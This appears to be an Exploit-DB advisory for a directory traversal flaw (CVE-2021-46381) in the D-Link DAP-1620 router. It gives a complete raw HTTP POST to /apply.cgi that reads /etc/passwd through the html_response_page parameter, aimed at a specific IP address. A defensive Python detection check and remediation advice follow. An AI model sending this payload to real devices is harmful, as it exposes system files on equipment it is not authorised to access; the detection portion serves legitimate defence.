DLINK DAP-1620 A1 v1.01 – Directory Traversal

  • Author: Momen Eldawakhly
    Date: 2022-05-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50919/
  • # Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
    # Date: 27/4/2022
    # Exploit Author: Momen Eldawakhly (Cyber Guy)
    # Vendor Homepage: https://me.dlink.com/consumer
    # Version: DAP-1620 - A1 v1.01
    # Tested on: Linux
    # CVE : CVE-2021-46381
    
    POST /apply.cgi HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Referer: http://84.217.16.220/
    Cookie: ID=634855649
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    Content-Length: 281
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
    Host: 84.217.16.220
    Connection: Keep-alive
    
    action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
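
For defenders, a detection check for this request pattern, added here as an example and not part of the original advisory or of any D-Link code. It flags POSTs to /apply.cgi whose html_response_page value leaves the web root. It assumes the method, path and form body of each request are available (for instance from a reverse-proxy capture); the sample requests and the function names are constructed for illustration.

```python
from urllib.parse import parse_qs, unquote

# Endpoint and parameter names come from the request on this page.
ENDPOINT = "/apply.cgi"
PARAM = "html_response_page"

# Constructed sample requests: (method, path, urlencoded body).
SAMPLES = [
    ("POST", "/apply.cgi", "action=do_graph_auth&html_response_page=index.html"),
    ("POST", "/apply.cgi",
     "action=do_graph_auth&html_response_page=../../../../etc/passwd&login_n=admin"),
    ("GET", "/index.html", ""),
]


def canonicalise(value, max_rounds=5):
    """Percent-decode until stable and unify path separators before checking."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def is_traversal(value):
    """True if the page name is absolute, holds a NUL, or has a '..' segment."""
    v = canonicalise(value)
    return v.startswith("/") or "\x00" in v or ".." in v.split("/")


def inspect_request(method, path, body):
    """Return the html_response_page values in one request that look unsafe."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    params = parse_qs(body, keep_blank_values=True)
    return [v for v in params.get(PARAM, []) if is_traversal(v)]


if __name__ == "__main__":
    for method, path, body in SAMPLES:
        hits = inspect_request(method, path, body)
        print(method, path, "ALERT" if hits else "ok", hits)
```

The same canonicalise-then-check order applies to any server-side fix: decode and normalise the page name first, then reject anything that is not a plain file name under the web root.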